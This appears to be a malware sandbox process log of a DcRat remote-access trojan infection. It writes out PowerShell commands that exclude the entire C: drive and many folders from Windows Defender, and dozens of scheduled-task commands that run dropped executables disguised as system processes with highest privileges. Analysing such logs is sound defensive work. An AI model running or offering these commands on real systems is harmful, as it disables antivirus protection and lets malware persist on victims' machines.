C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\brg4sgws\brg4sgws.cmdline"6⤵PID:3156
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3AE1.tmp" "c:\winNet\CSC4209010B7DB2458FA1F87AC12D82E0D1.TMP"7⤵PID:6088
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0oqq3fey\0oqq3fey.cmdline"6⤵PID:5848
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3B4F.tmp" "c:\Recovery\WindowsRE\CSC339F169BAEB64F12B23412325710F2F1.TMP"7⤵PID:5480
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vmnhnhd4\vmnhnhd4.cmdline"6⤵PID:5800
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3BCC.tmp" "c:\Program Files (x86)\Common Files\Java\Java Update\CSC5D76553A79294C23A2CD2DC6C0B98735.TMP"7⤵PID:5000
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2ldcdws2\2ldcdws2.cmdline"6⤵PID:5404
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3C29.tmp" "c:\DriversavessessionDlldhcp\CSC543B41D4C96B47E28D87A8E79CF2EE2.TMP"7⤵PID:1768
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\532r2fs2\532r2fs2.cmdline"6⤵PID:6116
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3C87.tmp" "c:\Users\Admin\CSCBDD51F59FF6D4F6CBF915D8B5E59DB6.TMP"7⤵PID:2720
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d0s2i2p5\d0s2i2p5.cmdline"6⤵PID:4388
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3CD5.tmp" "c:\winNet\CSC89A986E0123D4AF390BCDC8FD62C0DE.TMP"7⤵PID:4052
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l1m4nhol\l1m4nhol.cmdline"6⤵PID:5064
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3D62.tmp" "c:\Program Files (x86)\Google\Update\Offline\CSC3C5481A9DE4452AA561CB5E82AF685A.TMP"7⤵PID:5256
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cboiesuc\cboiesuc.cmdline"6⤵PID:5652
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3DC0.tmp" "c:\Users\Admin\Videos\CSC1DB3415AF1BA48279B72F2D47F01C5A.TMP"7⤵PID:1984
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qipd3qcq\qipd3qcq.cmdline"6⤵
- Drops file in System32 directory
PID:336 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3E0E.tmp" "c:\Windows\System32\CSC1AFE84F5994A4CC7B7794C40D55BC32D.TMP"7⤵PID:5060
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:1688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:2688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Config.Msi/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5528 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:5952
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:2792 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:2112
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:3576 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:2820
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:1876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msiexec.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:1176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5440
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kuNVXoYm1g.bat"6⤵PID:2488
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:4464
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- Runs ping.exe
PID:4028
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"7⤵
- Executes dropped EXE
PID:1984
-
-
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding F30DD0CAE4C7732765273216C88D2CE52⤵
- Loads dropped DLL
PID:3116
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EC49B12F580CBFBA323FD802A3571F332⤵
- Loads dropped DLL
PID:4080
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 29748A96FDF1E729166492EE12C50F35 E Global\MSI00002⤵
- Loads dropped DLL
PID:5504 -
C:\Windows\SysWOW64\wevtutil.exe"wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"3⤵PID:5048
-
C:\Windows\System32\wevtutil.exe"wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow644⤵PID:4788
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\Registry.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2284
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Default User\Registry.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3124
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Users\Default User\Registry.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:808
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\RuntimeBroker.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1456
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1760
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:232
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f1⤵
- Process spawned unexpected child process
PID:864
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:4880
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3792
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\SppExtComObj.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4592
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4388
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4696
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 12 /tr "'C:\Windows\PrintDialog\Assets\backgroundTaskHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3808
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\PrintDialog\Assets\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4800
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Windows\PrintDialog\Assets\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4064
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Users\Default\My Documents\sppsvc.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4388
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default\My Documents\sppsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2736
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Users\Default\My Documents\sppsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4460
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\winNet\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\winNet\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3232
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\winNet\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4964
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3012
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1896
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1692
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 8 /tr "'C:\Windows\SystemTemp\Crashpad\reports\msiexec.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3240
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Windows\SystemTemp\Crashpad\reports\msiexec.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1980
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 8 /tr "'C:\Windows\SystemTemp\Crashpad\reports\msiexec.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3636
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\winNet\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1284
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\winNet\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4956
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\winNet\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2908
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 7 /tr "'C:\winNet\msiexec.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1932
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\winNet\msiexec.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1952
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 13 /tr "'C:\winNet\msiexec.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4736
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files\Uninstall Information\dwm.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2236
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Uninstall Information\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4548
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5028
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3936
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:700
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\wscript.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:1684
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\wscript.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2128
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\wscript.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\winNet\RuntimeBroker.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4764
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\winNet\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2440
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\winNet\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:2248
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 8 /tr "'C:\DriversavessessionDlldhcp\SearchHost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2488
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchHost" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\SearchHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 7 /tr "'C:\DriversavessessionDlldhcp\SearchHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4776
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Bloxstrap.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2436
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Bloxstrap" /sc ONLOGON /tr "'C:\Users\Admin\Bloxstrap.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Bloxstrap.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1380
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\winNet\sihost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4328
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\winNet\sihost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1292
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 13 /tr "'C:\winNet\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:1760
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Google\Update\Offline\Idle.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2848
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Update\Offline\Idle.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1876
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Google\Update\Offline\Idle.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2080
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Videos\OfficeClickToRun.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3372
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Admin\Videos\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:4428
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Videos\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4880
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Users\Default\AppData\Roaming\Microsoft\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:236
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default\AppData\Roaming\Microsoft\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:424
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Users\Default\AppData\Roaming\Microsoft\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:784
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5932
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:232
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5380
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
